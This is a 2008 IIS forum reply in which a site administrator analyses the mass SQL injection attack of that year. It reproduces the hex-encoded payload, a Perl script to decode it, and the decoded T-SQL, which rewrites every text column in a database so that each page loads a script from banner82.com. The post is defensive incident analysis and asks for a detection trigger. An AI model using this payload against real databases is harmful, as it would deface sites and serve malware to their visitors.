We are excited to announce that the IIS.NET Forums are moving to the new Microsoft Q&A experience. Learn more >

View Complete Thread
  • Re: Anyone know about www.nihaorr1.com/1.js?

    Aug 22, 2008 06:22 PM|silkyfixer|LINK

    when this first happend to me last year befor the massive web attack i copied all the log files to my unix box and i used grep to parse through the files. it took me a while to pin point the injection since it was not in the wild at the time. I had coder write a decrypt script to decode the hex

    #!/usr/bin/perl

    my $s=<<"EOF";
    4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F72204355
    52534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E732062205748
    45524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220
    622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D2054
    61626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E2045584543282755504441
    5445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522838303030292C5B272B40432B275D2929
    2B27273C736372697074207372633D687474703A2F2F7777772E62616E6E657238322E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348
    204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C
    4F43415445205461626C655F437572736F72
    EOF
    while (length($s)>0) {
      my $hex=substr($s,0,2); $s=substr($s,2,length($s));
      my $ch=hex($hex); $ch=pack("C",$ch);
      print $ch;

    }

    now decoded you notice that its what was in the wild

    DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(8000),['+@C+']))+''<script src=http://www.banner82.com/b.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

     the question is have they found a new way to inject without the declare or a way around dequoting the injection. i have a fealing its a new type of attack and they dont use a declare.

    i will sift through the logs and see what i can find but its hard when you have hundreds of sites and log files

     it would be great if someone could write a trigger for mssql so that anytime an update contains %<script etc.. it will tell me what site it came from. this would help out greatly as i can then pinpoint where it came from. maybe mssql-scan :)